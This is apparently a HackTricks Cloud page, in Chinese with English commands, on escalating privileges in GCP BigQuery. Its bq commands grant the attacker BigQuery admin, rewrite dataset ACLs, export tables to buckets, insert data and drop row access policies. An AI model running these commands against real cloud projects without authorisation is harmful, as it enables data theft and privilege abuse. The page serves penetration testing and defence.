Chinese - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - BigQuery Privesc

支持 HackTricks

BigQuery

有关 BigQuery 的更多信息,请查看:

GCP - Bigquery Enum

读取表

读取存储在 BigQuery 表中的信息可能会发现敏感信息。访问这些信息所需的权限是 bigquery.tables.getbigquery.jobs.createbigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

这是另一种访问数据的方法。将其导出到云存储桶,然后下载包含信息的文件。 执行此操作需要以下权限:bigquery.tables.exportbigquery.jobs.createstorage.objects.create

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

有可能在 Bigquery 表中引入某些受信任的数据,以利用其他地方的漏洞。这可以通过以下权限轻松完成:bigquery.tables.getbigquery.tables.updateDatabigquery.jobs.create

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

bigquery.datasets.setIamPolicy

攻击者可以滥用此权限来赋予自己对 BigQuery 数据集的更多权限

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

仅此权限允许通过修改指示谁可以访问的ACL来更新您对BigQuery数据集的访问

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>

bigquery.tables.setIamPolicy

攻击者可以滥用此权限来为自己提供更多对BigQuery表的权限

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

根据文档,拥有上述权限可以更新行策略。 然而,使用 cli bq 你还需要一些额外的权限:bigquery.rowAccessPolicies.createbigquery.tables.get

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

可以在行策略枚举的输出中找到过滤器ID。示例:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

如果你有 bigquery.rowAccessPolicies.delete 而不是 bigquery.rowAccessPolicies.update,你也可以直接删除该策略:

# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

另一种绕过行访问策略的潜在选项是直接更改受限数据的值。如果你只能看到 termCfba 的记录,只需将表中的所有记录修改为 term = "Cfba"。然而,这种方法被 bigquery 阻止了。

支持 HackTricks
PreviousGCP - Batch PrivescNextGCP - ClientAuthConfig Privesc

Last updated